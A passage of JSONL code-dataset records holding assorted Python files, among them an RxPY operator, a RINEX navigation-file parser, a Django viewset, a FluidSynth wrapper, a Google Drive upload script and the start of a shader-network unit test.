return 0\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ascii_me.py","file_name":"ascii_me.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"87190561","text":"from typing import Callable, Any\nfrom rx.core import ObservableBase, AnonymousObservable\nfrom rx.core.typing import Mapper\n\n\ndef from_callback(func: Callable, mapper: Mapper = None) -> \"Callable[[...], ObservableBase]\":\n \"\"\"Converts a callback function to an observable sequence.\n\n Keyword arguments:\n func -- Function with a callback as the last parameter to\n convert to an Observable sequence.\n mapper -- [Optional] A mapper which takes the arguments\n from the callback to produce a single item to yield on next.\n\n Returns a function, when executed with the required parameters minus\n the callback, produces an Observable sequence with a single value of\n the arguments to the callback as a list.\n \"\"\"\n\n def function(*args):\n arguments = list(args)\n\n def subscribe(observer, scheduler=None):\n def handler(*args):\n results = list(args)\n if mapper:\n try:\n results = mapper(args)\n except Exception as err:\n observer.on_error(err)\n return\n\n observer.on_next(results)\n else:\n if isinstance(results, list) and len(results) <= 1:\n observer.on_next(*results)\n else:\n observer.on_next(results)\n\n observer.on_completed()\n\n arguments.append(handler)\n func(*arguments)\n\n return AnonymousObservable(subscribe)\n return function\n","sub_path":"rx/operators/observable/fromcallback.py","file_name":"fromcallback.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"89563797","text":"# from tensorflow.python import pywrap_tensorflow\n# import os\n# model_dir = './faceres/log/'\n# checkpoint_path = os.path.join(model_dir, \"model.ckpt-400.data-00000-of-00001\")\n# reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)\n# var_to_shape_map = reader.get_variable_to_shape_map()\n# for key in var_to_shape_map:\n# print(\"tensor_name: \", key)\n\nimport tensorflow as tf\nimport os\n\nlogdir='./face72/facell/'\n\nfrom tensorflow.python import pywrap_tensorflow\n\nckpt = tf.train.get_checkpoint_state(logdir)\n\n# global_step=ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n# print('global_step',global_step)\nreader = pywrap_tensorflow.NewCheckpointReader(ckpt.model_checkpoint_path)\nvar_to_shape_map = reader.get_variable_to_shape_map()\nfor key in var_to_shape_map:\n print(\"tensor_name: \", key)\n print(reader.get_tensor(key).shape)","sub_path":"face_into/face72/read_ckpt2.py","file_name":"read_ckpt2.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"216759879","text":"#!/usr/bin/env python2\nimport sys\nfrom os.path import dirname, realpath\n\nsys.path.append(realpath(dirname(__file__)))\nfrom gimpfu import main\nfrom _plugin_base import GimpPluginBase\n\n\nclass Deblur(GimpPluginBase):\n def run(self):\n self.model_file = 'DeblurGANv2.py'\n result = self.predict(self.drawable)\n self.create_layer(result)\n\n\nplugin = Deblur()\nplugin.register(\n proc_name=\"deblur\",\n blurb=\"deblur\",\n help=\"Running deblurring.\",\n author=\"Kritik Soman\",\n copyright=\"\",\n date=\"2020\",\n label=\"deblur...\",\n 
imagetypes=\"RGB*\"\n)\nmain()\n","sub_path":"plugins/deblur.py","file_name":"deblur.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42128830","text":"import sys\n\nf=open('graph2.txt')\nf=f.read().strip('\n').split()\nf=list(map(lambda x:x.split('->'),f))\nindegs=[[]for i in range(10000)]\noutdegs=[[]for i in range(10000)]\nt1=0\ncnt_edges=0\nvs=set([])\n\ndef dfs(u):\n    visited[u]=1\n    for v in outdegs[u]:\n        if visited[v]==0:\n            dfs(v)\n    return visited\n\ndef seiri():\n    global vs\n    for i in sorted(vs.copy()):\n        if i!=0 and len(indegs[i])==0:\n            outdegs[i]=[]\n            vs.remove(i)\n            seiri()\n    return vs\n\n# Build the graph\nfor i in f:\n    visited=[0]*10000\n    u,v=i[0],int(i[1])\n    if u[0]==\"!\":\n        try:\n            u=int(u[1:])\n            outdegs[u].remove(v)\n            indegs[v].remove(u)\n        except ValueError:\n            pass\n    else:\n        u=int(u)\n        outdegs[u].append(v)\n        indegs[v].append(u)\n        vs.add(u)\n        vs.add(v)\n    # Build the index of the root set\n    seiri()\n    routes=[]\n    ans=dfs(0)  # assumption: reachability is computed from vertex 0\n    for i,v in enumerate(ans):\n        if v==1:\n            routes.append(i)\n    for i in vs.copy():\n        if i not in routes:\n            vs.remove(i)\n    for i in range(len(outdegs)):\n        if i not in routes:\n            outdegs[i]=[]\n    for i in range(len(indegs)):\n        if i not in routes:\n            indegs[i]=[]\n\n    t1+=1\n\n\n# Count the directed edges\nfor i in outdegs:\n    cnt_edges+=len(i)\nprint('Number of directed edges:',cnt_edges)\n\n# Count the vertices\nprint(\"Number of vertices:\",len(vs))\n\n","sub_path":"utokyo_ist_pastexam/2010_2/3-1.py","file_name":"3-1.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"25235066","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nf = lambda x: 3*x**2 - 5\n\nx = np.arange(-5, 5, .05)\n\ndef bisec(f, a, b, tol):\n    \n    if f(a)*f(b) >= 0 :\n        print(\"no root in the interval\")\n        return None\n    \n    medio = (a + b)/2\n    \n    if np.abs(f(medio)) < tol:\n        return medio\n    \n    elif np.sign(f(a)) == np.sign(f(medio)):\n        return bisec(f, medio, b, tol)\n    \n    elif np.sign(f(b)) == np.sign(f(medio)):\n        return bisec(f, a, medio, tol)\n    ","sub_path":"Chapter7/Exercise4.py","file_name":"Exercise4.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42427636","text":"from signal import signal, SIGINT\nfrom goprocam import GoProCamera, constants\n\ndef handler(s, f):\n    gopro.stopWebcam()\n    quit()\n\nsignal(SIGINT, handler)\n\ngopro = GoProCamera.GoPro(ip_address=GoProCamera.GoPro.getWebcamIP())\ngopro.startWebcam(constants.Webcam.Resolution.R720p)\ngopro.webcamFOV(constants.Webcam.FOV.Linear)\ngopro.getWebcamPreview()\ngopro.KeepAlive()\n","sub_path":"examples/launch_webcam_preview.py","file_name":"launch_webcam_preview.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"41435226","text":"'''\nCopyright 2019 Penina Axelrad, Ryan Kain\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE 
IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n'''\n\nfrom datetime import datetime\nimport re\n\n\nblank_expr = re.compile('([0-9]+)X')\nvalue_expr = re.compile('([0-9]+)?([SIFD]{1}[0-9]+)(\\.[0-9]+)?')\n\n\ndef parse_rinex_line(line, line_format):\n    '''\n    Given the RINEX 2 navigation message line and\n    line format string, parses and returns list of\n    data in that line\n\n    Parameters\n    ----------\n    line : str\n        Line to parse into nav data\n    \n    line_format : str\n        Format string describing the data contents of the line\n\n    Returns\n    -------\n    list\n        List of the values parsed from the line according to\n        `line_format`.\n    '''\n    \n    line_components = line_format.split(',')\n    values = []\n    \n    # find the letter format specifier\n    for expr in line_components:\n        blank_match = blank_expr.match(expr)\n        if blank_match is not None:\n            num_blank = int(blank_match.groups()[0])\n            line = line[num_blank:]\n            continue\n        value_match = value_expr.match(expr)\n        if value_match is not None:\n            groups = value_match.groups()\n            multiple = int(groups[0]) if groups[0] is not None else 1\n            val_type = groups[1][0]\n            length = int(groups[1][1:])\n            precision = int(groups[2][1:]) if groups[2] is not None else 0\n            for i in range(multiple):\n                x = line[:length].strip()\n                if x == '':\n                    value = None\n                elif val_type == 'S':\n                    value = x\n                elif val_type == 'I':\n                    value = int(x)\n                elif val_type == 'F':\n                    value = float(x)\n                elif val_type == 'D':\n                    value = float(x.replace('D', 'E'))\n                values.append(value)\n                line = line[length:]\n    return values\n\nrinex2_nav_record_line_formats = [\n    'I2,1X,I2.2,1X,I2,1X,I2,1X,I2,1X,I2,F5.1,3D19.12',\n    '3X,4D19.12',\n    '3X,4D19.12',\n    '3X,4D19.12',\n    '3X,4D19.12',\n    '3X,4D19.12',\n    '3X,4D19.12',\n    '3X,4D19.12',\n]\n\nrinex2_nav_record_var_names = [\n    ['prn', 'yy', 'month', 'day', 'hour', 'minute', 'second', 'a0', 'a1', 'a2'],\n    ['iode1', 'c_rs', 'delta_n', 'm_0',],\n    ['c_uc', 'e', 'c_us', 'sqrt_a',],\n    ['t_oe', 'c_ic', 'omega_0', 'c_is',],\n    ['i_0', 'c_rc', 'omega', 'omega_dot',],\n    ['i_dot', 'l2_codes', 'week', 'l2p_data',],\n    ['accuracy', 'health', 'tgd', 'iodc',],\n    ['transmit_time', 'fit_interval'],\n]\n\ndef parse_RINEX2_nav_records(lines):\n    '''\n    Given the lines corresponding to navigation data records \n    from a RINEX 2 Nav file, parses the records and returns \n    a list of dictionaries with their contents.\n\n    Parameters\n    ----------\n    lines : array_like\n        List of strings, where each string is a line of nav data\n\n    Returns\n    -------\n    array_like\n        List of records containing data as passed in from `lines`\n    '''\n\n    # Assume lines contain complete records\n    i = 0\n    records = []\n    record_length = len(rinex2_nav_record_line_formats)\n    while i + record_length <= len(lines):\n        record_lines = lines[i:i + record_length]\n        record = {}\n        for line, line_format, var_names in zip(record_lines, rinex2_nav_record_line_formats, rinex2_nav_record_var_names):\n            values = parse_rinex_line(line, line_format)\n            for key, val in zip(var_names, values):\n                if key:\n                    record[key] = val\n        
records.append(record)\n        i += record_length\n    return records\n\n\ndef format_RINEX2_nav_records(records, century=2000):\n    '''\n    Take list of nav file records and sort into a dictionary with \n    PRN as the key and a list of records sorted by epoch as the value\n\n    Parameters\n    ----------\n    records : array_like\n        List of strings, where each string is a line of nav data\n    century : int\n        Century during which the two-digit year should be interpreted.\n        Default 2000.\n\n    Returns\n    -------\n    array_like\n        Dictionary of records containing data as passed in from `records`,\n        keyed by PRN.\n    '''\n    \n    ephemerides = {}\n    \n    # Look through each record and assign it to the respective PRN\n    for record in records:\n        sat_id = 'G{0:02}'.format(record['prn'])\n        ephemeris_list = ephemerides.get(sat_id, [])\n        eph = record.copy()\n        # Add the epoch time as a datetime object\n        eph['epoch'] = datetime(century + record['yy'], *(int(record[k]) for k in ['month', 'day', 'hour', 'minute', 'second']))\n        ephemeris_list.append(eph)\n        ephemerides[sat_id] = ephemeris_list\n\n    # Sort the data by epoch for each PRN\n    for key, ephemeris_list in ephemerides.items():\n        ephemerides[key] = sorted(ephemeris_list, key=lambda x: x['epoch'])\n\n    return ephemerides\n\n\ndef parse_rinex(filepath, return_header=True):\n    '''\n    Given the filepath to a RINEX 2 navigation message file,\n    parses and returns header and navigation ephemeris data.\n    Automatically removes obsoleted (corrected) data.\n\n    Parameters\n    ----------\n    filepath : str, file_like\n        filepath to or open file object of RINEX 2 navigation file\n\n    Returns\n    -------\n    array_like\n        Vector of the form [header, nav_data] where header is a list\n        containing the parsed header information and nav_data is a\n        dictionary containing a list of the navigation records for each\n        sat_id.\n    '''\n    \n    try:\n        with open(filepath, 'r') as f:\n            lines = list(f.readlines())\n    except TypeError:\n        lines = list(filepath.readlines())\n    \n    # Parse out the header\n    for i, line in enumerate(lines):\n        if line.find('END OF HEADER') >= 0:\n            break\n    header_lines = lines[:i + 1]\n    \n    # Parse through the nav lines\n    nav_lines = lines[i + 1:]\n    records = parse_RINEX2_nav_records(nav_lines)\n    ephemerides = format_RINEX2_nav_records(records)\n    \n    # Clean up ephemerides\n    for prn in ephemerides:\n        for ephem in ephemerides[prn]:\n            del_index = []\n            if ephem['t_oe'] % 3600 != 0:\n                # Ephemeris was corrected!\n                # Limit to 4 minutes away and remove any updates\n                # that happened \"later\" in time\n                for ii, e in enumerate(ephemerides[prn]):\n                    toe_diff = e['t_oe'] - ephem['t_oe']\n                    # If update is from less than 4 minutes in the future,\n                    # it should be superseded by this update\n                    if toe_diff < 4*60 and toe_diff > 0:\n                        # Keep track of each item to remove\n                        del_index.append(ii)\n            # Remove all obsoleted data (delete from the end so earlier indices stay valid)\n            for ii in sorted(del_index, reverse=True):\n                del ephemerides[prn][ii]\n    \n    if return_header:\n        return header_lines, ephemerides\n    else:\n        return ephemerides\n","sub_path":"ASEN5090/HW9 v1/read_ephemeris.py","file_name":"read_ephemeris.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"648743628","text":"from rest_framework.viewsets import ModelViewSet\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.response import Response\nfrom django.utils import timezone\nfrom rest_framework import status\nfrom rest_framework.settings import 
api_settings\nfrom django.db.models import Count\nfrom rest_framework.decorators import action\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\nfrom .models import Demand\nfrom .serializers import DemandSerializer\nfrom users.permissions import IsDemandManager\nfrom .filters import DemandFilter\n\nclass DemandViewSet(ModelViewSet):\n    queryset = Demand.objects.all().annotate(null_gut_matrix=Count('gut_matrix')).order_by('-null_gut_matrix', '-gut_matrix__gut', '-created_at')\n    serializer_class = DemandSerializer\n    permission_classes = (IsAuthenticated, IsDemandManager,)\n    authentication_classes = (JSONWebTokenAuthentication,)\n    filterset_class = DemandFilter\n\n    # Override default destroy to return method not allowed\n    def destroy(self, request, *args, **kwargs):\n\n        return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)\n\n    @action(detail=True, methods=['post'], url_path='switch-status')\n    def switch_status(self, request, *args, **kwargs):\n        demand = self.get_object()\n\n        if \"status\" not in request.POST:\n            error_message = {\n                \"status\": [\n                    \"This field is required.\"\n                ]\n            }\n            \n            return Response(status=status.HTTP_400_BAD_REQUEST, data=error_message)\n        \n        demand_status = request.POST.get('status')\n\n        if demand_status != 'ABERTA' and demand_status != 'EM ANDAMENTO' and demand_status != 'FECHADA':\n            error_message = {\n                \"status\": [\n                    \"'\" + demand_status + \"' is not a valid choice.\"\n                ]\n            }\n\n            return Response(status=status.HTTP_400_BAD_REQUEST, data=error_message)\n\n        elif demand_status == demand.status:\n            error_message = {\n                \"status\": [\n                    \"The demand already has the status '\" + demand_status + \"'.\"\n                ]\n            }\n\n            return Response(status=status.HTTP_400_BAD_REQUEST, data=error_message)\n        else:\n            try:\n                demand.status = demand_status\n                demand.save()\n\n                subject = \"The status of the demand '\" + demand.name + \"' has been updated!\"\n                message = \"Hello \" + demand.requester + \", the demand '\" + demand.name + \"' you requested has had its status updated to '\" + demand.status + \"'.\"\n                email_from = settings.EMAIL_HOST_USER\n                recipient_list = [demand.requester_email,]\n                send_mail(subject, message, email_from, recipient_list)\n\n                return Response(status=status.HTTP_200_OK)\n            except Exception:\n                return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n    ","sub_path":"demands/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"439539735","text":"import math\r\nimport csv\r\n\r\nwith open('P105data.csv',newline='') as f:\r\n    data=csv.reader(f)\r\n    file_data=list(data)    \r\nfile_data=file_data[0]\r\n\r\nn=len(file_data)\r\ntotal=0\r\nfor x in file_data:\r\n    total=total+int(x)\r\n    \r\nmean=total/n\r\n\r\n\r\nsquared_list=[]\r\nfor number in file_data:\r\n    a=int(number)-mean\r\n    a=a**2\r\n    squared_list.append(a)\r\n\r\nsum=0\r\nfor i in squared_list:\r\n    sum=sum+i\r\n\r\nresult=sum/(n-1)\r\nstd_dev=math.sqrt(result)\r\nprint(std_dev)\r\n","sub_path":"Class 105/p105.py","file_name":"p105.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156356664","text":"#from distutils.core import setup\nfrom setuptools import setup, find_packages\n\n#This is a list of files to install, and where\n#(relative to the 'root' dir, where setup.py is)\n#You could be more specific.\n\nfiles = [\"assets/*\"]\n\n\nsetup(name = \"PID1\",\n    version = \"0.01\",\n    
description = \"The python program to manage DGnet_Dist_PIDX repositories through the GitHub API\",\n    author = \"andriy\",\n    author_email = \"andriy@dgnet.cloud\",\n    url = \"https://github.com/andriykutsevol/DGnet_Dist_PID1.git\",\n    #Name the folder where your packages live:\n    #(If you have other packages (dirs) or modules (py files) then\n    #put them into the package directory - they will be found \n    #recursively.)\n    #packages = ['PID1'],\n    packages=find_packages(),\n    #'package' package must contain files (see list above)\n    #I called the package 'package' thus cleverly confusing the whole issue...\n    #This dict maps the package name =to=> directories\n    #It says, package *needs* these files.\n    package_data = {'PID1' : files },\n    \n    setup_requires=[\n    \t\t'PyGithub'\n    ], \n    \n    install_requires=[\n        'PyGithub'\n    ],\n    #Some additional script\n    #scripts = [\"bin/funniest-joke\"],\n    long_description = \"\"\"Really long text here.\"\"\" \n    #\n    #This next part is for the Cheese Shop, look a little down the page.\n    #classifiers = [] \n) \n","sub_path":"PID1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"649279585","text":"# Remove parentheses\n\n# Solution approach\n\n# Couldn't solve it with bitmasking, so ended up searching the internet\n# Build an array holding the index pairs of matching '(' and ')' (using enumerate)\n# Remove all () from the input value\n# Take combinations of the index array and insert each possible combination into an array\n# Sort\n\n######################\n\nfrom itertools import combinations\nproblem = [*input().strip()] # turn the string into a list of characters\n\np, idx_brs = [],[]\n# store the positions of matched parentheses in idx_brs\nfor i,v in enumerate(problem):\n    if v == '(':\n        problem[i] =''\n        p+=[i]\n    if v == ')':\n        problem[i] ='';\n        idx_brs +=[[p.pop(),i]]\n\nout = set()\n\n# restore matched parenthesis positions via combinations\nfor i in range(len(idx_brs)):\n    for j in combinations(idx_brs,i):\n        P = problem[:]\n        for v,w in j:\n            P[v] = '('\n            P[w] = ')'\n        out.add(''.join(P))\nfor i in sorted(out):print(i)\n","sub_path":"백준/Python/2800.py","file_name":"2800.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"599762351","text":"import fluidsynth\nimport time, os, sys\nimport threading\nimport logging\nfrom sf2utils.sf2parse import Sf2File\n\n\nclass Fluidsynth:\n    def __init__(self):\n        self.Channel = 0\n        self.SF2dir = \"/home/pi/soundfonts/sf2/\"\n        self.SF2paths = {}\n        self.SF2Path = self.buildSF2List()\n        self.BankPatchList = self.getSF2bankpatchlist(self.SF2Path)\n\n        self.name = \"FluidSynth\"\n        self.driver = \"jack\"\n        self.midi_driver = \"jack\"\n        self.jackname = \"fluidsynth\"\n        self.command_prompt = \"\\nFluidSynth initialization completed.\"\n\n    def __del__(self):\n        self.release()\n        print(\"Destructor called, Fluidsynth stopped.\")\n\n    def start(self, sf2path=None):\n        if not sf2path:\n            sf2path = self.SF2Path\n        logging.info(\"Starting Engine {}\".format(self.name))\n        self.fs = fluidsynth.Synth(gain=0.75, samplerate=48000)\n        self.fs.setting(\"audio.jack.autoconnect\", 1)\n        self.fs.setting(\"synth.polyphony\", 32)\n        self.fs.setting(\"audio.period-size\", 64)\n        self.fs.setting(\"audio.periods\", 4)\n        self.fs.setting(\"audio.realtime-prio\", 99)\n        self.fs.start(driver=self.driver, midi_driver=self.midi_driver)\n        self.sfid = self.fs.sfload(sf2path)\n        self.switchSF2(sf2path, 0, 0, 1)\n        self.Bank = self.fs.channel_info(self.Channel)[1]\n        self.Patch = self.fs.channel_info(self.Channel)[2]\n        self.PatchName = self.fs.channel_info(self.Channel)[3]\n        self.Index = self.BankPatchList.index([self.Bank, 
self.Patch])\n        print(\"fluidsynth running...\")\n        return\n\n    def release(self):\n        if self.fs:\n            self.fs.delete()\n        return\n\n    def buildSF2List(self):\n        for file in os.listdir(self.SF2dir):\n            if file[-4:].lower() == \".sf2\":\n                print(file)\n                self.SF2paths.update({file[:-4]: (self.SF2dir + file)})\n        return self.SF2paths[list(self.SF2paths.keys())[0]]\n\n    def getSF2bankpatchlist(self, sf2path: str):\n        \"\"\"\n        Gets a nested list of the banks and patches in use by the soundfont\n        (yes it's a horribly nested one liner, but it works)\n        \"\"\"\n        with open(sf2path, \"rb\") as sf2_file:\n            sf2 = Sf2File(sf2_file)\n\n        return [\n            [int(i[0]), int(i[1])]\n            for i in [\n                i.split(\":\")\n                for i in sorted([i[7:14] for i in str(sf2.presets)[1:-1].split(\", \")])[\n                    :-1\n                ]\n            ]\n        ]\n\n    def switchSF2(self, sf2path: str, channel: int, bank: int, patch: int):\n        \"\"\"\n        Changes the current soundfont, patch, and bank for a given channel, and changes the current values to represent that.\n        \"\"\"\n        self.BankPatchList = self.getSF2bankpatchlist(sf2path)\n        self.Channel = channel\n        self.Bank = bank\n        self.Patch = patch\n        self.fs.program_select(self.Channel, self.sfid, self.Bank, self.Patch)\n        self.PatchName = self.fs.channel_info(self.Channel)[3]\n        return\n\n    def nextPatch(self, direction):\n        \"\"\"\n        Finds next non empty patch, moving to the next bank if needs be.\n        Max bank 128 before it loops around to 0.\n        \"\"\"\n        if direction == \"up\":\n            if (self.Index + 1) == len(self.BankPatchList):\n                self.Index = 0\n            else:\n                self.Index += 1\n        if direction == \"down\":\n            if self.Index == 0:\n                self.Index = len(self.BankPatchList) - 1\n            else:\n                self.Index -= 1\n        [self.Bank, self.Patch] = self.BankPatchList[self.Index]\n        self.fs.program_select(self.Channel, self.sfid, self.Bank, self.Patch)\n        print(self.fs.channel_info(self.Channel))\n        self.PatchName = self.fs.channel_info(self.Channel)[3]\n        return [\n            self.PatchName,\n            \"Bank \" + str(self.Bank) + \" Patch \" + str(self.Patch),\n        ]\n\n    def bgBankPatchCheck(self):\n        \"\"\"\n        Checks if the bank and/or patch has changed in the background without us noticing.\n        \"\"\"\n        while True:\n            if (self.Bank != self.fs.channel_info(self.Channel)[1]) | (\n                self.Patch != self.fs.channel_info(self.Channel)[2]\n            ):\n                self.Bank = self.fs.channel_info(self.Channel)[1]\n                self.Patch = self.fs.channel_info(self.Channel)[2]\n                self.PatchName = self.fs.channel_info(self.Channel)[3]\n                # if not inMenu:\n                #     # change the text too\n                #     display_message([currPatchName, 'Bank ' + str(currBank) +\n                #                      ' Patch ' + str(currPatch)],\n                #                     static=True)\n            time.sleep(0.1)\n\n    # bg_thread = threading.Thread(target=bgBankPatchCheck, daemon=True)\n    # bg_thread.start()\n","sub_path":"includes/fluidsynth.py","file_name":"fluidsynth.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"517959384","text":"from apiclient.discovery import build\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom httplib2 import Http\nfrom apiclient.http import MediaFileUpload\nimport datetime\nimport socket\n\n\nscopes = ['https://www.googleapis.com/auth/drive']\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('/home/debian/google/credentials.json', scopes)\n\nhttp_auth = credentials.authorize(Http())\ndrive = build('drive', 'v3', http=http_auth)\n\nrequest = drive.files().list().execute()\nfiles = request.get('files', [])  # Drive API v3 returns the list under 'files', not 'items'\nfor f in files:\n    print(\"File list:\",f)\n\n\nnow = datetime.datetime.now()\nhost = 
socket.gethostname()\nstamp=str(now.year)+\"_\"+str(now.month)+\"_\"+str(now.day)+\"_\"+str(now.hour)+\"_\"+str(now.minute)+\"_\"+str(host)+\".mp4\"\n\nfolder_id = '1nIClELa_-tbI3UtV-glpG2qtcet_kJOH' #server\nfolder_id = '1ccABX1N63zHbHmCUCus3XH4lZfMhkSUd' #video\nfile_metadata = {\n    'name': stamp,\n    'parents': [folder_id]\n}\nmedia = MediaFileUpload('/home/debian/video/video.mp4',\n                        mimetype='video/mp4',  # the file being uploaded is an MP4 video\n                        resumable=True)\nprint(\"Uploading..\",stamp)\nfile = drive.files().create(body=file_metadata,\n                                    media_body=media,\n                                    fields='id').execute()\nprint ('File ID:', file.get('id'))\nexit()\n","sub_path":"run_on_bbb/service_account.py","file_name":"service_account.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"416781225","text":"##########################################################################\n#\n#  Copyright (c) 2018, Image Engine Design Inc. All rights reserved.\n#\n#  Redistribution and use in source and binary forms, with or without\n#  modification, are permitted provided that the following conditions are\n#  met:\n#\n#      * Redistributions of source code must retain the above\n#        copyright notice, this list of conditions and the following\n#        disclaimer.\n#\n#      * Redistributions in binary form must reproduce the above\n#        copyright notice, this list of conditions and the following\n#        disclaimer in the documentation and/or other materials provided with\n#        the distribution.\n#\n#      * Neither the name of John Haddon nor the names of\n#        any other contributors to this software may be used to endorse or\n#        promote products derived from this software without specific prior\n#        written permission.\n#\n#  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n#  IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n#  THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n#  PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nimport unittest\n\nimport imath\n\nimport IECore\nimport IECoreScene\n\nclass ShaderNetworkAlgoTest( unittest.TestCase ) :\n\n\tdef testAddShaders( self ) :\n\n\t\tn1 = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"out\" : IECoreScene.Shader( \"lambert\", \"surface\" ),\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"file\", \"shader\" ),\n\t\t\t},\n\t\t\toutput = ( \"out\", \"\" )\n\t\t)\n\n\t\tn2 = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"manifold\" : IECoreScene.Shader( \"uv\", \"shader\" ),\n\t\t\t\t\"texture\" : IECoreScene.Shader( \"noise\", \"shader\" ),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"manifold\", \"\" ), ( \"texture\", \"manifold\" ) ),\n\t\t\t],\n\t\t\toutput = ( \"texture\", \"\" )\n\t\t)\n\n\t\tc = n1.copy()\n\t\tp = IECoreScene.ShaderNetworkAlgo.addShaders( c, n2 )\n\t\tself.assertEqual( p, IECoreScene.ShaderNetwork.Parameter( \"texture1\", \"\" ) )\n\n\t\tself.assertEqual(\n\t\t\tc.shaders(),\n\t\t\t{\n\t\t\t\t\"out\" : n1.getShader( \"out\" ),\n\t\t\t\t\"texture\" : n1.getShader( \"texture\" ),\n\t\t\t\t\"manifold\" : n2.getShader( \"manifold\" ),\n\t\t\t\t\"texture1\" : n2.getShader( \"texture\" ),\n\t\t\t}\n\t\t)\n\n\t\tself.assertEqual(\n\t\t\tc.inputConnections( \"texture1\" ),\n\t\t\t[ c.Connection( ( \"manifold\", \"\" ), ( \"texture1\", \"manifold\" ) ) ],\n\t\t)\n\n\tdef testRemoveUnusedShaders( self ) :\n\n\t\tn = IECoreScene.ShaderNetwork(\n\t\t\tshaders = {\n\t\t\t\t\"used1\" : IECoreScene.Shader(),\n\t\t\t\t\"used2\" : IECoreScene.Shader(),\n\t\t\t\t\"used3\" : IECoreScene.Shader(),\n\t\t\t\t\"unused1\" : IECoreScene.Shader(),\n\t\t\t\t\"unused2\" : IECoreScene.Shader(),\n\t\t\t\t\"unused3\" : IECoreScene.Shader(),\n\t\t\t},\n\t\t\tconnections = [\n\t\t\t\t( ( \"used1\", \"out\" ), ( \"used2\", \"in\" ) ),\n\t\t\t\t( ( \"used2\", \"out\" ), ( \"used3\", \"in\" ) ),\n\t\t\t\t( ( \"unused1\", \"out\" ), ( \"unused2\", \"in\" ) ),\n\t\t\t\t( ( \"unused2\", \"out\" ), ( \"unused3\", \"in\" ) ),\n\t\t\t],\n\t\t\toutput = ( \"used3\", 